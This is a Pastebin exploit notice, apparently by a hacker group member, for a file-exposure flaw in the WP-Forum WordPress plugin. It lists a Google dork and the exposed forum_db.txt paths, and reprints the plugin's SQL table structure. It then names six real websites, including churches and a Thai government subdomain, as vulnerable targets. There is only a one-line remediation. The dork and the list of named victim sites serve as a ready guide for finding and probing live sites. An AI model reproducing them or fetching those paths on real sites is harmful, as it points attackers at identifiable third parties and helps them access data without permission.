Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###########################################################################
- # Exploit Title : WordPress 2.0.2 WP-Forum Plugins 1.7.8 Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 27/03/2019
- # Vendor Homepage : wordpress.org
- # Software Information Link :
- github.com/motdotla/annmotte.com/blob/master/wp-content/plugins/wp-forum/forum_db.txt
- wordpress.org/plugins/tags/wp-forum/
- # Software Affected Version : WordPress 2.0.2 and 2.1 / Plugin Version 1.7.8
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : forum_db.txt inurl:/wp-content/plugins/wp-forum/
- # Vulnerability Type :
- CWE-200 [ Information Exposure ]
- CWE-538 [ File and Directory Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Acunetix Information Link about phpMyAdmin SQL dump File =>
- acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
- # Reference Link : cxsecurity.com/ascii/WLB-2019030225
- ###########################################################################
- # Information About Software :
- ****************************
- Simple discussion forum plugin for WordPress. With support for different skins, 3 included
- by default, changeable from the WP admin interface. Admin can choose if unregistered posting is
- allowed and Captcha (optional) is used for spam control. Tight interaction with Wordpress
- makes an easy to use and administer plugin.
- # Installation :
- *************
- 1. Rename wpforum to wp-forum and copy it to to wp-content/plugins
- 1. Go and activate the plugin
- 1. Create a page from the Manage tab
- 1. Click on the HTML button in Wordpress and then insert: `<!--WPFORUM-->`
- 1. Go to manage->wp-forum and start adding groups and forums.
- 1. You must then visit the WP-Forum options panel in WP admin.
- 1. Setup a link to your forum (unless you have your pages auto-linking in the navigation menu)
- 1. To show the latest acitvity in the sidebar add this code:
- `<?php forum_latest_acivity(numbers_to_show);?>` where numbers_to_show is an actual number like 1,2,3
- 1. If you upload a new version go to plugin managment and deactivate and
- the activate WP-Forum. Visit the structure page of the wp-forum management.
- ###########################################################################
- # Impact :
- ***********
- * An information exposure is the intentional or unintentional disclosure of information to
- an actor that is not explicitly authorized to have access to that information.
- * The product stores sensitive information in files or directories that are accessible
- to actors outside of the intended control sphere.
- * phpMyAdmin is a free software tool written in PHP, intended to handle the administration of
- MySQL over the World Wide Web. It can be used to dump a database or a collection of databases
- for backup or transfer to another SQL server (not necessarily a MySQL server).
- The dump typically contains SQL statements to create the table, populate it, or both.
- This file contains an phpMyAdmin SQL dump. This information is highly sensitive
- and should not be found on a production system.
- Remediation : Restrict access to this file or remove it from the system.
- ###########################################################################
- # Database Disclosure Exploit :
- ***************************
- /wp-content/plugins/wp-forum/forum_db.txt
- /wp-content/plugins/wp-form/wpforum/forum_db.txt
- # Information :
- **************
- -- phpMyAdmin SQL Dump
- -- version 2.7.0-pl2
- -- phpmyadmin.net
- --
- -- Host: localhost
- -- Server version: 5.0.19
- -- PHP Version: 5.1.4
- --
- -- Database: `wordpress`
- --
- -- --------------------------------------------------------
- --
- -- Table structure for table `wp_forum_forums`
- --
- CREATE TABLE `wp_forum_forums` (
- `id` int(11) NOT NULL auto_increment,
- `name` varchar(255) NOT NULL default '',
- `parent_id` int(11) NOT NULL default '0',
- `description` varchar(255) NOT NULL default '',
- `views` int(11) NOT NULL,
- PRIMARY KEY (`id`)
- ) ;
- -- --------------------------------------------------------
- --
- -- Table structure for table `wp_forum_groups`
- --
- CREATE TABLE `wp_forum_groups` (
- `id` int(11) NOT NULL auto_increment,
- `name` varchar(255) NOT NULL default '',
- PRIMARY KEY (`id`)
- ) ;
- -- --------------------------------------------------------
- --
- -- Table structure for table `wp_forum_posts`
- --
- CREATE TABLE `wp_forum_posts` (
- `id` int(11) NOT NULL auto_increment,
- `author_name` varchar(255) default NULL,
- `author_email` varchar(255) default NULL,
- `author_web` varchar(255) default NULL,
- `text` longtext,
- `thread_id` int(11) NOT NULL default '0',
- `date` datetime NOT NULL default '0000-00-00 00:00:00',
- `author_id` int(11) NOT NULL,
- `subject` varchar(255) NOT NULL,
- `views` int(11) NOT NULL,
- PRIMARY KEY (`id`)
- ) ;
- -- --------------------------------------------------------
- --
- -- Table structure for table `wp_forum_threads`
- --
- CREATE TABLE `wp_forum_threads` (
- `id` int(11) NOT NULL auto_increment,
- `forum_id` int(11) NOT NULL default '0',
- `views` int(11) NOT NULL default '0',
- `subject` varchar(255) NOT NULL default '',
- `date` datetime NOT NULL default '0000-00-00 00:00:00',
- PRIMARY KEY (`id`)
- ) ;
- ###########################################################################
- # Example Vulnerable Sites :
- *************************
- [+] centres-animation-quartiers-bordeaux.eu/wp-content/plugins/wp-forum/forum_db.txt
- [+] thebrashbrothers.com/wp-content/plugins/wpforum/forum_db.txt
- [+] dgerard.com/news.41clubs.be/wp-content/plugins/wp-forum/forum_db.txt
- [+] ridceo.rid.go.th/udornth/xxnongkungthanasan/wp-content/plugins/wp-form/wpforum/forum_db.txt
- [+] templebaptistchurchonline.com/wordpress/wp-content/plugins/wp-forum/forum_db.txt
- [+] templebaptist.church/wordpress/wp-content/plugins/wp-forum/forum_db.txt
- ###########################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###########################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement